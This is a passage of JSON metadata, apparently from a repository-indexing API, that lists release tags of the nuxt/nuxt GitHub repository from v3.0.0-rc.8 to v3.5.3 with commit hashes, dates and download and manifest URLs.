},{"name":"v3.5.3","sha":"199595f3afac38b2a41be0a1c5593a8b6ea03366","kind":"commit","published_at":"2023-06-06T00:24:34.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.5.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.3/manifests"},{"name":"v3.5.2","sha":"d85348987f8fd0e36763de69d6c665b630532429","kind":"commit","published_at":"2023-05-29T11:48:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.5.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.2/manifests"},{"name":"v3.5.1","sha":"f13ccfe8363e3ababea7379d07822953eea555aa","kind":"commit","published_at":"2023-05-21T16:39:15.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.5.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.1/manifests"},{"name":"v3.5.0","sha":"9683c3dad3fc31d5a2f780f6e7e785c1eeedc797","kind":"commit","published_at":"2023-05-16T13:29:04.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.5.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.0/manifests"},{"name":"v3.4.3","sha":"1464294d6abe13b54fdb8d204732345551c8e647","kind":"commit","published_at":"2023-04-28T19:08:45.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.4.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.3/manifests"},{"name":"v3.4.2","sha":"607bfdcfefe3520c89202fe5a5525794792192d7","kind":"commit","published_at":"2023-04-20T13:51:12.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.4.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.2/manifests"},{"name":"v3.4.1","sha":"940fb0b7ad73960257f3e5f868186c302308e43b","kind":"commit","published_at":"2023-04-13T10:31:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.4.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.1/manifests"},{"name":"v3.4.0","sha":"25e3a9046cc1b3dd9c1bf2c188a627b0a9446ad2","kind":"commit","published_at":"2023-04-11T16:17:01.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.4.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.0/manifests"},{"name":"v3.3.3","sha":"8e9d7157a8d4fae6d2d0ae4598dd7c2ae14e5571","kind":"commit","published_at":"2023-04-02T14:14:21.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.3.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.3/manifests"},{"name":"v3.3.2","sha":"dd6f9c01ccea00ddb37d15ce1773a054b99f08db","kind":"commit","published_at":"2023-03-24T18:31:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.3.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.2/manifests"},{"name":"v2.16.3","sha":"6ca842e36ed935950608f02b539fc2985f5f3ef9","kind":"tag","published_at":"2023-03-17T15:39:19.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.16.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.16.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.16.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.3/manifests"},{"name":"v3.3.1","sha":"184d57bb1923b8bf21a372eabdb67e1241d2023f","kind":"commit","published_at":"2023-03-14T14:45:19.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.3.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.1/manifests"},{"name":"v3.3.0","sha":"2ebf5f4c4488c911e8bcc273cb8b12b86bf3562e","kind":"commit","published_at":"2023-03-14T13:22:41.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.3.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.0/manifests"},{"name":"v2.16.2","sha":"ca8b375e2eb38c452b1b227e83c2cdad6de2f030","kind":"tag","published_at":"2023-03-01T13:03:07.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.16.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.16.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.2/manifests"},{"name":"v3.2.3","sha":"021ba4310e47301996967c2a9b581152095cb995","kind":"commit","published_at":"2023-02-28T11:19:32.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.2.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.3/manifests"},{"name":"v3.2.2","sha":"3a832bacb8f747bc3df656ddb926defe607b07f3","kind":"commit","published_at":"2023-02-17T16:39:15.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.2.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.2/manifests"},{"name":"v3.2.1","sha":"5c47d4c5ab0add324a412c9d64700acf41b41f5b","kind":"commit","published_at":"2023-02-17T15:56:00.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.2.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.1/manifests"},{"name":"v2.16.1","sha":"41148648ee597424c94a31ce0f36bb742c5ec695","kind":"commit","published_at":"2023-02-13T12:08:34.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.16.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.16.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.1/manifests"},{"name":"v3.2.0","sha":"5855c1ed53ae1336fcfeb118a27c7201a9b83949","kind":"commit","published_at":"2023-02-09T10:55:03.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.2.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.0/manifests"},{"name":"v3.1.2","sha":"225988ebd56aedf831b37bfce293ba76814ddb59","kind":"commit","published_at":"2023-02-03T12:56:51.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.1.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.1.2/manifests"},{"name":"v2.16.0","sha":"6dc6cef9abd17346498d41572dd47a4fd99c900d","kind":"tag","published_at":"2023-02-03T12:48:42.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.16.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.0/manifests"},{"name":"@nuxt/ui-templates@1.1.1","sha":"537c50b7b9c35753c69786e23b14b0a8ee8af112","kind":"tag","published_at":"2023-01-31T14:49:44.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-templates@1.1.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-templates@1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-templates%401.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@1.1.1/manifests"},{"name":"@nuxt/ui@0.4.1","sha":"537c50b7b9c35753c69786e23b14b0a8ee8af112","kind":"tag","published_at":"2023-01-31T14:49:44.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui@0.4.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui@0.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui%400.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui@0.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui@0.4.1/manifests"},{"name":"3.1.1","sha":"deb0837c1655b7446befcc8c7df4dedeb3154974","kind":"commit","published_at":"2023-01-25T22:04:45.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/3.1.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/3.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@3.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/3.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/3.1.1/manifests"},{"name":"v3.1.1","sha":"deb0837c1655b7446befcc8c7df4dedeb3154974","kind":"commit","published_at":"2023-01-25T22:04:45.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.1.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.1.1/manifests"},{"name":"v3.1.0","sha":"c552d1b420caaac0184fd5c332ebc55b0b0d77ad","kind":"commit","published_at":"2023-01-24T16:47:20.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.1.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.1.0/manifests"},{"name":"@nuxt/ui-templates@1.1.0","sha":"7bb778ecb71a72350fc16484851b8c163b1db434","kind":"tag","published_at":"2023-01-06T14:51:53.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-templates@1.1.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-templates@1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-templates%401.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@1.1.0/manifests"},{"name":"@nuxt/ui-assets@0.2.0","sha":"7bb778ecb71a72350fc16484851b8c163b1db434","kind":"tag","published_at":"2023-01-06T14:51:53.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-assets@0.2.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-assets@0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-assets%400.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-assets@0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-assets@0.2.0/manifests"},{"name":"@nuxt/ui@0.4.0","sha":"7bb778ecb71a72350fc16484851b8c163b1db434","kind":"tag","published_at":"2023-01-06T14:51:53.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui@0.4.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui@0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui%400.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui@0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui@0.4.0/manifests"},{"name":"v3.0.0","sha":"d991a55ec36f5ac61de0af7d0b018a150153445b","kind":"commit","published_at":"2022-11-16T14:56:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0/manifests"},{"name":"v3.0.0-rc.14","sha":"0faeb3b5a33203d543de32bf1b9a40b394b979ab","kind":"commit","published_at":"2022-11-16T02:38:42.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.14","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.0.0-rc.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.14/manifests"},{"name":"v3.0.0-rc.13","sha":"bde96947333501c22a5e981515bd27c24eb8b88f","kind":"commit","published_at":"2022-11-04T11:37:49.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.13","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.0.0-rc.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.13/manifests"},{"name":"v3.0.0-rc.12","sha":"09e553467e970a3bbd092698640c96ddf86d596b","kind":"commit","published_at":"2022-10-18T18:47:21.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.12","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.0.0-rc.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.12/manifests"},{"name":"v3.0.0-rc.11","sha":"6309d223bb247764e32e90d196aca5fd4b913805","kind":"commit","published_at":"2022-09-20T16:38:31.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.11","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.0.0-rc.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.11/manifests"},{"name":"@nuxt/ui-templates@0.4.0","sha":"3ba81f1e3a88bd38fd5e0ee52e152dcc8bfe1715","kind":"tag","published_at":"2022-09-20T07:35:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-templates@0.4.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-templates@0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-templates%400.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.4.0/manifests"},{"name":"@nuxt/ui@0.3.3","sha":"3ba81f1e3a88bd38fd5e0ee52e152dcc8bfe1715","kind":"tag","published_at":"2022-09-20T07:35:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui@0.3.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui@0.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui%400.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui@0.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui@0.3.3/manifests"},{"name":"v3.0.0-rc.10","sha":"94377b190180922c8156f6753512362392b3552d","kind":"commit","published_at":"2022-09-14T16:27:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.10","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.0.0-rc.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.10/manifests"},{"name":"@nuxt/ui-templates@0.3.3","sha":"1115aac4272174a3e9f106581a1051cce5c1731e","kind":"tag","published_at":"2022-09-05T13:39:27.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-templates@0.3.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-templates@0.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-templates%400.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.3.3/manifests"},{"name":"@nuxt/ui@0.3.2","sha":"1115aac4272174a3e9f106581a1051cce5c1731e","kind":"tag","published_at":"2022-09-05T13:39:27.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui@0.3.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui@0.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui%400.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui@0.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui@0.3.2/manifests"},{"name":"v3.0.0-rc.9","sha":"9caa9ca31fca90a775d316bfc68ac98952d82942","kind":"commit","published_at":"2022-09-03T10:36:47.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.0.0-rc.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.9/manifests"},{"name":"@nuxt/ui-templates@0.3.2","sha":"dafb9ed0e436601b44a7dc8e6caa459314193ec7","kind":"tag","published_at":"2022-08-12T21:23:40.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-templates@0.3.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-templates@0.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-templates%400.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.3.2/manifests"},{"name":"v3.0.0-rc.8","sha":"3960f513c377e1ef5d47986a13c1c66c1eaa1afc","kind":"commit","published_at":"2022-08-12T13:35:33.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.0.0-rc.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.8/manifests"},{"name":"@nuxt/ui-templates@0.3.1","sha":"4a9060d9cc44e23bc833dfb7ab652fc687fba390","kind":"tag","published_at":"2022-08-11T21:17:42.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-templates@0.3.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-templates@0.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-templates%400.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.3.1/manifests"},{"name":"@nuxt/ui@0.3.1","sha":"4a9060d9cc44e23bc833dfb7ab652fc687fba390","kind":"tag","published_at":"2022-08-11T21:17:42.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui@0.3.1","html_url":"https://github.com/nux